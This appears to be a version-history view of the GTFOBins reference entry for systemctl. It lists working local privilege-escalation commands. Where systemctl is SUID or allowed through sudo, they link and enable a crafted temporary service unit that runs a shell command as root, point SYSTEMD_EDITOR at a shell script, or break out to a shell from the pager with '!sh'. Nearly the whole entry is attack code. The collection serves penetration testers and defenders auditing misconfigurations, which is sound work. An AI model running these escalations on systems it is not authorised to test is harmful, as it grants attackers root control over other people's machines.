GTFOBins.github.io/_gtfobins/systemctl.md

33 lines
883 B
Markdown
Raw Normal View History

2019-01-29 13:12:29 +00:00
---
functions:
suid:
- code: |
TF=$(mktemp).service
echo '[Service]
2019-01-29 13:25:16 +00:00
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
2019-01-29 13:12:29 +00:00
./systemctl link $TF
./systemctl enable --now $TF
sudo:
- code: |
TF=$(mktemp)
echo /bin/sh >$TF
chmod +x $TF
sudo SYSTEMD_EDITOR=$TF systemctl edit system.slice
2019-01-29 13:12:29 +00:00
- code: |
TF=$(mktemp).service
echo '[Service]
2019-01-29 13:25:16 +00:00
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
2019-01-29 13:12:29 +00:00
sudo systemctl link $TF
sudo systemctl enable --now $TF
2019-04-16 13:41:32 +00:00
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo systemctl
!sh
2019-01-29 13:12:29 +00:00
---